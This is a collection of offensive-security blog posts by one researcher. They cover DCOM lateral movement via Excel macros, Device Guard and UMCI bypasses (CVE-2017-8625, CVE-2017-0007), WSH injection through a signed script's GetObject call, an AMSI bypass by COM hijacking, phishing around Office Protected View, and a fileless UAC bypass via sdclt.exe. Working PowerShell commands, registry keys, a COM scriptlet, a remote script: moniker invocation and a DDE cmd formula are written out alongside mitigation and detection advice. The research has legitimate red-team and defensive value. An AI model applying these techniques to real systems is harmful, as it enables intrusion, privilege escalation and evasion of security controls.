Lateral Movement using Excel.Application and DCOM

Back in January, I put out two blog posts on using DCOM for lateral movement; one using MMC20.Application and the other outlining two other DCOM applications that expose “ShellExecute” methods. While most techniques have one execution method (WMI has the Create() method, psexec creates a service with a custom binpath, etc.), DCOM allows you to use different objects that expose various methods. This allows an operator to pick and choose what they look like when they land on the remote host from a parent-child process relationship perspective.

In this post, I’m going to walk through abusing the Excel.Application DCOM application to execute arbitrary code on a remote host. This same DCOM application was recently talked about for lateral movement by using the RegisterXLL method, which you can read about here. In this post, I’m going to focus on the “Run()” method. In short, this method allows you to execute a named macro in a specified Excel document. You can probably see where I’m going with this 🙂

As you all may know, VBA macros have long been a favorite technique for attackers. Normally, VBA abuse involves a phishing email with an Office document containing a macro, along with enticing text to trick the user into enabling that malicious macro. The difference here is that we are using macros for pivoting and not initial access. Due to this, Office Macro security settings are not something we need to worry about. Our malicious macro will execute regardless.

At this point, we know that Excel.Application is exposed via DCOM. By using OLEViewDotNet by James Forshaw (@tiraniddo), we can see that there are no explicit launch or access permissions set:

If a DCOM application has no explicit Launch or Access permissions, Windows allows members of the local Administrators group to Launch and Access the application remotely. This is because DCOM applications have a “Default” set of Launch and Access permissions; if no explicit permissions are assigned, the Default set is used. This can be found in dcomcnfg.exe and will look like this:

Since Local Administrators are able to remotely interface with Excel.Application, we can then remotely instantiate it via PowerShell using [Activator]::CreateInstance():
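
A minimal PowerShell sketch of that remote instantiation might look like this (the target IP is a placeholder, and local admin rights on the remote host are assumed):

# Placeholder target; requires local admin rights on the remote host
$target = "192.168.99.132"
$excel  = [Activator]::CreateInstance([Type]::GetTypeFromProgID("Excel.Application", $target))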

As you can see, remote instantiation succeeded. We now have the ability to interact with Excel remotely. Next, we need to move our payload over to the remote host. This will be an Excel document that contains our malicious macro. Since VBA allows Win32 API access, the possibilities are endless for various shellcode runners. For this example, we will just use shellcode that starts calc.exe. If you are curious, you can find an example here.

Just create a new macro, name it whatever you want, add in your code and then save it. In this instance, my macro name is “MyMacro” and I am saving the file in the .xls format.

With the actual payload created, the next step is to copy that file over to the target host. Since we are using this technique for Lateral Movement, we need Local Admin rights on the target host. Since we have that, we can just copy the file over:
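
Copying the workbook can be as simple as pushing it over the C$ admin share; the file name and destination path below are placeholders:

# Copy the macro-laden workbook to the target over the C$ admin share
Copy-Item -Path .\LegitFile.xls -Destination "\\$target\C$\Windows\Temp\LegitFile.xls"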

With the payload on target, we just need to execute it. This can be done using the Run() method of the Excel.Application DCOM application that was instantiated earlier. Before we can actually call that method, the application needs to know what Excel file the macro resides in. This can be accomplished using the “Workbooks.Open()” method. This method just takes the local path of the file. So, what happens if we invoke the method and pass the location of the file we just copied?

Well, isn’t that interesting. The file exists, but Excel.Application is stating that it doesn’t. Why might this be? When Excel.Application is instantiated via DCOM, it is actually instantiated via the Local System identity. The Local System user, by default, does not have a profile. Since Excel assumes that it is in an interactive user session, it fails in a less than graceful way. How can we fix this? There are better ways to do this, but a quick solution is to remotely create the Local System profile.

The paths for this profile are C:\Windows\System32\config\systemprofile\Desktop and C:\Windows\SysWOW64\config\systemprofile\Desktop.
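
A quick, hedged sketch of creating those Desktop folders remotely over the C$ share (again assuming local admin rights):

# Remotely create the Local System profile's Desktop folders
New-Item -ItemType Directory -Force -Path "\\$target\C$\Windows\System32\config\systemprofile\Desktop" | Out-Null
New-Item -ItemType Directory -Force -Path "\\$target\C$\Windows\SysWOW64\config\systemprofile\Desktop" | Out-Null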

Now that the Local System profile is created, we need to re-instantiate the Excel.Application object and then call “Workbooks.Open()” again:

As you can see, we were now able to open the workbook containing our malicious macro. At this point, all we need to do is call the “Run()” method and pass it the name of our malicious macro. If you remember from above, I named mine “MyMacro”.
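
Picking up the earlier sketch, opening the copied workbook and invoking the macro might look roughly like this (paths and names are the placeholders used above):

# Open the workbook by its local path on the target, then run the named macro
$workbook = $excel.Workbooks.Open("C:\Windows\Temp\LegitFile.xls")
$excel.Run("MyMacro")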

Calling “Run("MyMacro")” will cause the VBA in that macro to execute. To verify, we can open Process Explorer on the remote host. As you can see below, this particular host has the “Disable VBA for Office Applications” GPO set. Regardless of that security setting, the macro is permitted to execute:

For this example, I just used calc spawning shellcode, which resulted in a child process being spawned under Excel.exe. Keep in mind that since VBA offers a lot in terms of interaction with the OS, it is possible to not spawn a child process and just inject into another process instead. The final steps would be to remotely cleanup the Excel object and delete the payload off the target host.
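
A rough sketch of that cleanup, continuing the example above:

# Close Excel, release the DCOM object and remove the payload from the target
$excel.Quit()
[System.Runtime.InteropServices.Marshal]::ReleaseComObject($excel) | Out-Null
Remove-Item "\\$target\C$\Windows\Temp\LegitFile.xls"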

I have automated this technique via PowerShell, which you can find here: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b

To assist in mitigating this vector, you could manually apply remote Launch and Access permissions to the Excel.Application object…but don’t forget to look at all the other Office applications. Another option would be to change the default remote Launch/Access DACLs via dcomcnfg.exe. Keep in mind that any DACL changes should be tested as such modifications could potentially impact legitimate usage.  In addition to that, enabling the Windows Firewall and reducing the number of Local Administrators on a host are also valid mitigation steps.

What stands out the most with this technique is that Excel and its child process will spawn as the invoking user. This will often mean process creations under a user account different from the one currently logged on. If those are the only two processes and the account being used doesn’t normally log on to that host, that might be a red flag.

-Matt N.

UMCI vs Internet Explorer: Exploring CVE-2017-8625

In recent months, I have spent some time digging into Device Guard and how User Mode Code Integrity (UMCI) is implemented. If you aren’t familiar with Device Guard, you can read more about it here. Normally, UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and places PowerShell in Constrained Language mode. This makes obtaining code execution on a system fairly challenging. This post is going to highlight bypassing User Mode Code Integrity to instantiate objects that are normally blocked.

This bug was fixed in the August 2017 Patch Tuesday release under CVE-2017-8625. The patch fixed two different techniques as both of them abuse the fact that MSHTML isn’t enlightened. The other technique abused Microsoft Compiled HTML Help files (CHMs). This was blogged about by @Oddvarmoe and you can read more about that here: https://msitpros.com/?p=3909

As I mentioned above, the root cause of the bug was that MSHTML wasn’t enlightened in the context of UMCI. This essentially means that Device Guard’s UMCI component didn’t restrict MSHTML and simply let it execute everything with assumed “Full Trust.” Due to this, Internet Explorer permitted loading restricted objects. How, you might ask? The answer lies with Internet Explorer’s ability to interface with ActiveX and COM components =)

For example, the below HTML file will use a script tag to run some JScript. UMCI normally blocks instantiation of this object (and just about every other one). As a PoC, I just instantiated WScript.Shell and invoked the “Run” method to demonstrate I could instantiate a blocked object and invoke one of its methods.
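
A minimal sketch of such a page follows, written out here via a PowerShell here-string; the embedded JScript simply instantiates WScript.Shell and calls its Run method, and the output path is arbitrary:

# Write a PoC HTML page whose JScript instantiates WScript.Shell and runs calc.exe
$poc = @'
<html>
  <head>
    <script language="JScript">
      var shell = new ActiveXObject("WScript.Shell");
      shell.Run("calc.exe");
    </script>
  </head>
</html>
'@
Set-Content -Path "$env:TEMP\poc.html" -Value $poc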

As you can see below, “WScript.Shell” was blocked from instantiating via UMCI. Immediately following that, we instantiate “WScript.Shell” again via the HTML file and then start “calc.exe” via the “Run” method:

Since MSHTML didn’t conform to the same restrictions as other OS components, the WScript.Shell object was permitted to load and the Run method was freely accessible.

It should be noted that Internet Explorer does apply zone security to prevent automatic execution of ActiveX controls via HTML. When opened, the user will see two prompts, one from IE asking permission to enable the ActiveX content and another security warning alerting the user that the content might be malicious. If an attacker is on a system but doesn’t have unsigned code execution (see WMImplant), all it takes is two User Hive registry changes to temporarily disable the ActiveX alerting, allowing for silent unsigned code-execution. Those two changes look like this:

Most UMCI bypasses are serviceable bugs per Microsoft, so be sure to send those over to secure@microsoft.com if you like CVEs =)

With CVE-2017-8625 issued, ActiveX/COM controls can no longer be loaded this way, as Internet Explorer is now enlightened. This hopefully makes MSHTML bypasses a bit harder to find =)

Disclosure timeline:

12/13/2016: Report submitted to secure@microsoft.com
03/2017: Fix was pushed into RS1 (Creators Update)
08/08/2017: RS1 fix was back ported; CVE-2017-8625 issued

-Matt N.

WSH Injection: A Case Study

At BSides Nashville 2017, Casey Smith (@SubTee) and I gave a talk titled Windows Operating System Archaeology. At this talk, we released a handful of offensive techniques that utilized the Component Object Model (COM) in Windows. One such technique described was abusing attacker controlled input passed to calls to GetObject(), which I will be discussing here.

Some environments use whitelisting to prevent unsigned Windows Scripting Host (WSH) files from running, especially with the rise of malicious .js or .vbs files. However, by “injecting” our malicious code into a Microsoft signed WSH script, we can bypass such a restriction.

Before diving into the different scripts that can be used for injection, it’s important to understand some of the mechanics behind why this works. When abusing injection, we are taking advantage of attacker controlled input passed to GetObject() and then combining that with the “script:” or “scriptlet:” COM monikers.

GetObject()

This method allows you to access an already instantiated COM object. If there isn’t an instance of the object already (if invoked without a moniker), this call will fail. For example, accessing Microsoft Excel’s COM object via GetObject() would look like this:

Set obj = GetObject( , "Excel.Application")

For the above to work, an instance of Excel has to be running. You can read more about GetObject() here.

COM Monikers

While GetObject() is interesting by itself, it only allows us to access an instance of an already instantiated COM object. To get around this, we can implement a COM moniker to facilitate our payload execution. If you aren’t familiar with COM monikers, you can read more about them here. There are various COM monikers on Windows that allow you to instantiate objects in various ways. From an offensive standpoint, you can use these monikers to execute malicious code. That is a topic for another blog post :-).

For this post, we will focus on the “script:” and “scriptlet:” monikers. These particular monikers interface with scrobj.dll and help facilitate execution of COM scriptlets, which will be the payload. This was discovered by Casey Smith (@SubTee) and discussed at DerbyCon 2016 as well as blogged about here.

An example COM scriptlet will look like this:

<?XML version="1.0"?>
<scriptlet>
<!-- progid/classid are arbitrary placeholder values -->
<registration progid="PoC" classid="{00000001-0000-0000-0000-0000FEEDACDC}"></registration>
<script language="JScript"><![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]></script>
</scriptlet>

You can also use James Forshaw’s (@tiraniddo) tool DotNetToJScript to extend the JScript/VBScript in the COM Scriptlet, allowing for Win32 API access and even Shellcode execution. When you combine one of these two monikers and various calls to GetObject(), a lot of fun is had.

Now that the very brief COM background is over, time to look at an example 🙂

PubPrn.vbs

On Windows 7+, there is a Microsoft Signed WSH script called “PubPrn.vbs,” which resides in “C:\Windows\System32\Printing_Admin_Scripts\en-US”. When looking at this particular script, it becomes apparent that it is taking input provided by the user (via command line arguments) and passing an argument to “GetObject()”.

This means that we can run this script and pass it the two arguments it expects. The first argument can be anything and the second argument is the payload via the script: moniker.

Note: If you provide a value that isn’t a network address for the first argument (since it expects a ServerName), you can add the “/b” switch to cscript.exe when calling to suppress any additional error messages.
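
An illustrative invocation (the .sct URL is a placeholder for wherever you host your COM scriptlet) would be:

# First argument is a throwaway "ServerName"; second is the payload via the script: moniker
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\PubPrn.vbs 127.0.0.1 "script:https://example.com/payload.sct"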

Since VBScript relies on COM to perform actions, it is used heavily in numerous Microsoft signed scripts. While this is just one example, there are bound to be others that can be exploited in a similar fashion. I encourage you to go hunting 🙂

-Matt N.

Bypassing AMSI via COM Server Hijacking

Microsoft’s Antimalware Scan Interface (AMSI) was introduced in Windows 10 as a standard interface that provides the ability for AV engines to apply signatures to buffers both in memory and on disk. This gives AV products the ability to “hook” right before script interpretation, meaning that any obfuscation or encryption has gone through their respective deobfuscation and decryption routines. If desired, you can read more on AMSI here and here. This post will highlight a way to bypass AMSI by hijacking the AMSI COM server, analyze how Microsoft fixed it in build #16232 and then how to bypass that fix.

This issue was reported to Microsoft on May 3rd, and has been fixed as a Defense in Depth patch in build #16232.

To get started, this is what an AMSI test sample through PowerShell will look like when AMSI takes the exposed scriptblock and passes it to Defender to be analyzed:

As you can see, AMSI took the code and passed it along to be inspected before Invoke-Expression was called on it. Since the code was deemed malicious, it was prevented from executing.

That begs the question: how does this work? Looking at the exports of amsi.dll, you can see the various function calls that AMSI exports:

One thing that stood out to me immediately was amsi!DllGetClassObject and amsi!DllRegisterServer, as these are COM entry points used to facilitate instantiation of a COM object. Fortunately, COM servers are easy to hijack since medium integrity processes default to searching the current user registry hive (HKCU) for the COM server before looking in HKCR/HKLM.

Looking in IDA, we can see the COM Interface ID (IID) and ClassID (CLSID) being passed to CoCreateInstance():

We can verify this by looking at ProcMon:

What ends up happening is that AMSI’s scanning functionality appears to be implemented via its own COM server, which is exposed when the COM server is instantiated. When AMSI gets loaded up, it instantiates its COM component, which exposes methods such as amsi!AmsiOpenSession, amsi!AmsiScanBuffer, amsi!AmsiScanString and amsi!AmsiCloseSession. If we can force the COM instantiation to fail, AMSI will not have access to the methods it needs to scan malicious content.

Since the COM server is resolved via the HKCU hive first, a normal user can hijack the InProcServer32 key and register a non-existent DLL (or a malicious one if you like code execution). In order to do this, there are two registry entries that need to be made:
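
A rough PowerShell sketch of those two entries is below; the CLSID placeholder stands in for the value visible in the IDA/ProcMon output above, and the exact .reg entries are in the gist linked further down:

# Hijack the HKCU COM server resolution for AMSI's CLSID (placeholder value)
$clsid = "{<AMSI CLSID>}"
$key   = "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32"
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name "(default)" -Value "C:\IDontExist"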

When AMSI attempts to instantiate its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless.

As you can see, importing the above registry change causes “C:\IDontExist” to be returned as the COM server:

Now, when we try to run our “malicious” AMSI test sample, you will notice that it is allowed to execute because AMSI is unable to access any of the scanning methods via its COM interface:

You can find the registry changes here:

https://gist.github.com/enigma0x3/00990303951942775ebb834d5502f1a6

Now that the bug is understood, we can go about looking at how Microsoft fixed it in build #16232. Since amsi.dll is AMSI’s COM server as well, diffing the two DLLs seemed like a good place to start. Looking at the diff, the AmsiInitialize function stood out as it likely contains logic to actually instantiate AMSI.

On the left, we have the old AMSI DLL and on the right, we have the newly updated AMSI DLL. As you can see, Microsoft appears to have removed the call to CoCreateInstance() and replaced it with a direct call to DllGetClassObject(). CoCreateInstance() can be defined as a high-level function used to instantiate COM objects that is implemented using CoGetClassObject(). After resolution finishes (partially via registry CLSID lookups) and the COM server is located, the server’s exported function “DllGetClassObject()” is called. By replacing CoCreateInstance with a direct call to amsi.dll’s DllGetClassObject() function, the registry resolution is avoided. Since AMSI is no longer querying the CLSID in the registry for the COM server, we are no longer able to hijack it.

Now that we know the fix, how do we go about bypassing it? Before proceeding, it is important to understand that this particular bug has been publicized and talked about since 2016. Essentially, scripting interpreters, such as PowerShell, load amsi.dll from the working directory instead of loading it from a safe path such as System32. Due to this, we can copy PowerShell.exe to a directory we can write to and bring back the vulnerable version of amsi.dll. At this point, we can either hijack the DLL off the bat, or we can create our same registry keys to hijack AMSI’s COM component. Since this vulnerable AMSI version still calls CoCreateInstance(), we can hijack the registry search order again.
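
A hedged sketch of that setup, with placeholder paths and the old amsi.dll sourced separately:

# Copy PowerShell into a user-writable folder next to a vulnerable amsi.dll, then launch it
$dir = "$env:USERPROFILE\Desktop\bypass"
New-Item -ItemType Directory -Force -Path $dir | Out-Null
Copy-Item "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" $dir
Copy-Item .\amsi.dll $dir    # older, vulnerable amsi.dll
& "$dir\powershell.exe"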

First, we can verify that the patched amsi.dll version doesn’t query the COM server via the registry by creating a ProcMon filter for powershell.exe and AMSI’s CLSID. When PowerShell starts, you will notice no entries come up:

Next, we drop the vulnerable AMSI DLL and move PowerShell to the same directory. As you can see, it is now querying the registry to locate AMSI’s COM server:

With the vulnerable AMSI DLL back, we can now execute the COM server hijack:

Detection: Despite the fix in build #16232, it is still possible to execute this bypass via a DLL hijack using the old, vulnerable AMSI DLL. For detection, it would be ideal to monitor (via command line logging, etc.) for any binaries (wscript, cscript, PowerShell) that are executed outside of their normal directories. Since the bypass to the fix requires moving the binary to a user writeable location, alerting on these executing in non-standard locations would catch this.

-Matt N.

Phishing Against Protected View

Microsoft Office has a security feature called Protected View. This feature opens an Office document that originates from the internet in a restricted manner. The idea is that it will prevent automatic exploitation of things such as OLE, Flash and ActiveX by restricting the Office components that are allowed to execute. In 2016, Microsoft patched a bug in Protected View around Excel Add-in files via CVE-2016-4117. @HaifeiLi has done some great research in this area, which you can read about here. MWR Labs also has a great white paper on understanding the Protected View Sandbox, which you can read about here. In this post, I will highlight some techniques you can employ to circumvent Protected View while still having access to the techniques us red teamers have grown to know and love.

In my experience, end users are less likely to exit Protected View than they are to click through an Office dialogue box. I believe the reason for this is that they can access the document’s content while in Protected View, which is all they really need. When phishing, reducing the number of clicks for a user is always helpful. Protected View adds one additional click; if we can get rid of it, we will be better off.

Full Disclosure: These were reported to MSRC on April 20th, 2017 and all of these have been deemed not a security issue. Features, not bugs 😉

Before I get into these techniques, it’s important to understand the normal behavior. Attackers often use a number of tricks to get code-execution on a target system. This often ranges from Office macros, to OLE objects and Excel formula injection via DDE. If we embed a LNK into an Excel document via OLE, we will see this locally:

 

Now, if we host the above document, Protected View will activate and the embedded OLE object will not be able to activate via a double-click until Protected View is exited:

This is what should happen when a document comes in from the internet; things such as OLE, ActiveX and DDE should be blocked until “Enable Editing” is clicked.

Now that we know what normal Protected View behavior looks like, we can dive into some ways around it. The first one I want to cover is executing a file via OLE from a Publisher file. Like Word and Excel, Microsoft Publisher often comes with Microsoft Office and includes similar functionality, such as OLE embedding. Attackers often use LNK files embedded via OLE, so we will do the same in this example. Publisher offers many features to make the OLE object enticing to the user. For simplicity, I will not go into these features.

For this example, we will use a LNK payload that simply executes: “C:\Windows\System32\cmd.exe /c calc.exe”. I won’t go into embedding OLE inside Publisher either as it’s nearly identical to the other Office formats. If we host the Publisher file with the OLE embedded LNK, you will notice that Protected View does not activate. Clicking on the OLE object displays one prompt to the user:

Clicking “Open” will cause the LNK to execute:

As you can see, double clicking the OLE object resulted in the LNK being executed (after an “Open File” prompt). Normally, Protected View would have prevented the OLE object from being activated until the user explicitly exited it.

Next, we will go into OneNote, which allows files to be attached to notes. LNK files look a bit odd when attached to OneNote, so we will use a VBScript instead. For this example, the VBScript file will simply execute calc.exe via the Run method of the WScript.Shell COM object. For simplicity, I won’t go into dressing the document up to entice the user.

If we host the OneNote file (.ONE) with the attached VBScript file, you will notice that Protected View does not activate. The user is presented with one dialogue:

Clicking “OK” will result in the VBScript being executed:

 

So far, we have Publisher files and OneNote files that don’t trigger Protected View, but allow for OLE embedding, or something similar. Finally, there are Excel Symbolic Link files. This file format somewhat restricts the content it can host. In my testing, SLK files will strip OLE objects and any existing macro when saved. Fortunately, there are still attacks like Excel Formula Injection via DDE. If you don’t know about this technique, you can read more about it here.

Normally, Protected View will prevent automatic cell updating, which renders this attack useless while in Protected View. If we add a malicious formula and save it as a Symbolic Link (.SLK) file, we can get around the Protected View portion of the attack.

In this example, the Excel formula will be something like this:

=cmd|' /C calc'!A0

It is important to note that the DDE injection attack does present the user with two security warnings. There may be additional functionality in Excel SLK files outside of DDE that won’t prompt two security dialogues…I encourage you to use your imagination 🙂

If we save the file as a normal Excel file, you will notice that Protected View blocks the automatic “Enable” prompt, and requires the user to exit Protected View first:

Now, if we save the file as .SLK and host it, you will notice that Protected View is not activated, and the user is automatically presented with the “Enable, Disable” prompt. 

Clicking “Enable” will present the user with the following dialogue. I’ll be the first to say that users love to click “Yes” on this prompt 😉

Clicking “Yes” will result in the command being executed:

While the user is presented with two prompts for the .SLK attack, users are often less likely to exit Protected View than to click through the displayed prompts. From a Red Team perspective, any way to get around Protected View is worth the investment in terms of payload delivery.

Prevention: I am not currently aware of a way to manually enroll Publisher, OneNote and .SLK files into Protected View. User awareness training is recommended. If your end users do not use OneNote and Publisher, one solution would be to uninstall those applications.

-Matt N.

Defeating Device Guard: A look into CVE-2017-0007

Over the past few months, I have had the pleasure to work side-by-side with Matt Graeber (@mattifestation) and Casey Smith (@subtee) in their previous job roles, researching Device Guard user mode code integrity (UMCI) bypasses. If you aren’t familiar with Device Guard, you can read more about it here: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/device-guard-deployment-guide.  In short, Device Guard UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and it places PowerShell in Constrained Language mode, unless the scripts themselves are signed by a trusted signer. After spending some time evaluating how scripts are handled on Device Guard enabled systems, I ended up identifying a way to get any unapproved script to execute on a Device Guard enabled system. Upon reporting the issue to MSRC, this bug was eventually assigned CVE-2017-0007 (under MS17-012) and patched. This particular bug only impacts PowerShell and the Windows Scripting Host, and not compiled code.

This bug is my first CVE and my first time reversing a patch. This post is a write-up of not only the bug, but the patch reverse-engineering process that I took as well. Since this is my first time doing this, there are bound to be errors. If I stated something incorrectly, please let me know so I can learn 🙂

When executing a signed script, wintrust.dll handles validating the signature of that file. This was determined after looking at the exports. Ideally, if you take a Microsoft signed script and modify it, the integrity of the file has been compromised, and the signature should no longer be valid. Such validation is critical and fundamental to Device Guard, where its sole purpose is to prevent unsigned or untrusted code from running. CVE-2017-0007 circumvents this protection, allowing you to run any unsigned code you want by simply modifying a script that was previously signed by an approved signer. In this case, a Microsoft signed script was chosen since code signed by Microsoft needs to be able to run on Device Guard. For example, if we try to run an unsigned PowerShell script that executes restricted actions (e.g. instantiation of most COM objects), it will fail due to PowerShell being in Constrained Language mode. Any signed and trusted PowerShell code that is approved via the deployed Code Integrity Policy is permitted to run in “FullLanguage” mode, allowing it to execute with no restrictions. In this case, our code is not signed nor trusted, so it is placed in Constrained Language mode and fails to execute correctly.

Fortunately, Microsoft has scripts that are signed with their code signing certificate. You can validate that a script is indeed signed by Microsoft using sigcheck or the PowerShell cmdlet “Get-AuthenticodeSignature”. In this case, I grabbed a signed PowerShell script from the Windows SDK and renamed it to “MicrosoftSigned.ps1”:
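
For example, checking the renamed script with the cmdlet might look like this (the path is illustrative):

# Inspect the embedded authenticode signature of the script
Get-AuthenticodeSignature -FilePath .\MicrosoftSigned.ps1 | Format-List SignerCertificate, Status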

When scripts like these are signed, they often contain an embedded authenticode signature within the body of the script. If you were to modify any contents of that file, the integrity of said file would be broken and the signature would no longer be valid. You can also simply copy the authenticode signature block from a signed file and paste it into the body of an unsigned script:

As you can see, the original contents of the script were replaced with our own code, and sigcheck reports that “The digital signature of the object did not verify”, meaning the integrity of the file has been compromised and the code will be blocked from running, right?

As you can see, our code executed anyway, despite the invalidated digital signature. Microsoft assigned this bug CVE-2017-0007, classified under MS17-012. The underlying issue here is that the error code returned by the function that ensures the file’s integrity never gets validated, resulting in successful execution of the unsigned code.

So, what is the reason for the bug, and how was it fixed? Device Guard relies on wintrust.dll to handle some of the signature and integrity checks on signed files. Due to the nature of the bug, this was the first place I looked. Bindiffing wintrust.dll pre-patch (10.0.14393.0) and post-patch (10.0.14393.953) reveals that a new chunk of code was added. While there was one other change to wintrust.dll, this was the only change that pertained to validating signed scripts. Due to this, it is very likely the patch for the bug:

Looking closer, you will see that some code from “sub_18002D0F8” was removed:

Looking at the newly added block named “sub_18002D104”, you will see that it contains some code from “sub_18002D0F8” as well as some additions. These particular functions don’t have symbols, so we must refer to them as the defined names. Alternatively, you can also rename these functions in IDA to something more meaningful.

The text above is a bit small, but I will go into depth on what exactly was done. I won’t go into specifics on using bindiff, but if you want to learn more I recommend you check out the manual. Armed with the general location of the bug fix, I set out to identify exactly what was happening when our unsigned code was executed. Knowing that some code was removed from “sub_18002D0F8” and added to a new block named “sub_18002D104” made these two places a good starting point. First, I opened up the pre-patch version of wintrust.dll (10.0.14393.0) in IDA, and navigated to the sub that was modified in the patch (sub_18002D0F8). This function starts off by setting a few variables and then calls “SoftpubAuthenticode”.

Looking at “SoftpubAuthenticode” reveals that it calls another function named “CheckValidSignature”:

It makes sense that “CheckValidSignature” would handle validating the signature/integrity of the file being executed. Looking at this function, we can get the location of the last instruction before it returns.

We can see the error code from “CheckValidSignature” in the eax register by setting a windbg breakpoint at the last instruction in the function, which is highlighted in yellow above.

In this case, the error code is “0x80096010”, which translates to “TRUST_E_BAD_DIGEST”, according to wintrust.h in the Windows SDK. This is why we see “The digital signature of the object did not verify.” when running sigcheck on a modified signed file. After “CheckValidSignature” returns (via retn), we arrive back at “SoftpubAuthenticode”.

“SoftPubAuthenticode” then goes on to call “SoftpubCallUI” and then returns back to “sub_18002D0F8”, all while keeping our error code “0x80096010” in the eax register. Now that we know what the error code is and where it is stored, we can take a close look at why our script was actually allowed to run, despite “CheckValidSignature” returning “TRUST_E_BAD_DIGEST”. At this point, we are resuming execution in sub_18002D0F8, immediately after the call to “SoftpubAuthenticode”.

Since our error code is stored in eax, it gets overwritten immediately after returning from SoftpubAuthenticode via “mov rax, [r12]”.

Since the error code stating that our script’s digital signature isn’t valid doesn’t exist anymore, it never gets validated and the script is allowed to execute:

With an understanding of exactly what the bug is, we can go look at how Microsoft patched it. In order to do so, we need to install KB4013429. Looking at the new version of wintrust.dll (10.0.14393.953), we can explore “sub_18002D104”, which is the added block of code that was identified towards the beginning of the blog post. We know that the bug stemmed from the register holding our error code was being overwritten and not validated. We can see that the patch added a new call to “sub_18002D4BC” following the return from “SoftPubAuthenticode”.

You may also notice in the picture above that our error code gets placed in the ecx register, and the instruction that overwrites the rcx register is now dependent on a test instruction, followed by a “jump if zero” instruction. This means that our error code, now stored in “ecx”, will only get overwritten if the jump isn’t followed. Looking at the newly introduced sub “sub_18002D4BC”, you will see this:

This function returns a BOOL (0 or 1), depending on the result of operations performed on our error code. This addition checks to see if the call to “SoftpubAuthenticode” succeeded (< 0x7FFFFFFF) or if the return code matches “0x800B0109”, which translates to “CERT_E_UNTRUSTEDROOT”. In this case, SoftpubAuthenticode returned 0x80096010 (TRUST_E_BAD_DIGEST) which does not match either of the described conditions, resulting in the function returning 1 (TRUE).

After setting “al” to “1” and returning back to the previous function, we can see how this bug was actually patched:

With “al” set to “1”, the function does another logical compare to see if “al” is zero or not. Since it isn’t, it sets the “r14b” register to “0” (since the ZF flag isn’t set from the previous “test” instruction). It then does a last logical compare to check if “r14b” is zero. Since it is, it follows the jump and skips over the portion of code that overwrites the “rcx” register (leaving ecx populated with our error code). The error code eventually gets validated and the script is placed in Constrained Language mode, causing failed execution.

Cheers,
Matt

“Fileless” UAC Bypass using sdclt.exe

Recently, I published a post on using App Paths with sdclt.exe to bypass UAC. You may remember that the App Path bypass required a file on disk. Since sdclt.exe is out there, I figured I would publish another bypass using that binary, only this one is fileless. I mentioned it in my previous post, but the Vault7 leak confirms that bypassing UAC is operationally interesting, even to nation states, as several UAC bypasses/notes were detailed in the dump. As far as public bypasses go, definitely check out the UACME project by @hfiref0x, which has a nice collection of public techniques.

In newer versions of Windows, Microsoft has shown that they are taking the bypasses seriously. This has motivated me to spend a little more time on UAC and the different methods around it.

As some of you may know, there are some Microsoft signed binaries that auto-elevate due to their manifest. You can read more about these binaries and their manifests here. While searching for more of these auto-elevating binaries by using the SysInternals tool “sigcheck“, I came across “sdclt.exe” and verified that it auto-elevates due to its manifest:

*Note: This only works on Windows 10. The manifest for sdclt.exe in Windows 7 has the requestedExecutionLevel set to “AsInvoker”, preventing auto-elevation when started from medium integrity.

As I mentioned in my last post, a common technique used to investigate loading behavior on Windows is to use SysInternals Process Monitor to analyze how a process behaves when executed. I often work some basic binary analysis into my investigative process in order to see what other opportunities exist.

One of the first things I tend to do when analyzing an auto-elevate binary is to look for any potential command line arguments. I use IDA for this, but you can use your preferred tool. When peering into sdclt.exe, I noticed a few arguments that stood out due to interesting keywords:

These were interesting as sdclt.exe is set to auto-elevate in its manifest anyway. Looking at sdclt.exe in IDA, it checks if the argument matches “/kickoffelev”. If it does, it sets the full path for “sdclt.exe”, adds “/KickOffJob” as a parameter and then calls SxShellExecuteWithElevate.

Following that path, SxShellExecuteWithElevate starts “%systemroot%\system32\sdclt.exe /kickoffjob” with the “Runas” verb. This is essentially programmatically executing the “RunAsAdministrator” option when you right-click a binary.

The next step is to run “sdclt.exe /Kickoffelev” with procmon running. After going through the output, we see the trusty “shell\<verb>\command” registry search path in the HKEY_CURRENT_USER hive.

The next step was to add those keys and see if our binary and parameters of choice would execute. Unfortunately, nothing executed after adding the keys and starting “sdclt.exe /kickoffelev”. Looking back in procmon, our keys are queried, but sdclt.exe is actually looking for an additional value within the “command” key: “IsolatedCommand”.

We can then add our payload and parameters in a string (REG_SZ) value within the “Command” key called “IsolatedCommand”:
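
A minimal sketch of those registry changes (the payload and parameters are placeholders; the linked Invoke-SDCLTBypass.ps1 below automates all of this):

# Create the runas\command key and the IsolatedCommand value in HKCU
$key = "HKCU:\Software\Classes\exefile\shell\runas\command"
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name "IsolatedCommand" -Value "C:\Windows\System32\cmd.exe /c notepad.exe"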

This is the same bug (minus the IsolatedCommand portion) that was used in the eventvwr.exe “fileless” UAC bypass. You can read about the eventvwr.exe bypass and the specific registry keys used here. Notice that instead of “shell\open\command”, we now see “shell\runas\command”. This is because sdclt.exe was invoked (again) using the “RunAs” verb via SxShellExecuteWithElevate.

After adding our payload as the “IsolatedCommand” value, running “sdclt.exe /KickOffElev” will execute our payload (and any parameters) in a high-integrity context:

To demonstrate this technique, you can find a script here: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1

The script takes a full path to your payload and any parameters. “C:\Windows\System32\cmd.exe /c notepad.exe” is a good one to validate. It will automatically add the keys, start “sdclt.exe /kickoffelev” and then cleanup.

This particular technique can be remediated or fixed by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group. Further, if you would like to monitor for this attack, you could utilize methods/signatures to look for and alert on new registry entries in HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand

Cheers,
Matt

Bypassing UAC using App Paths

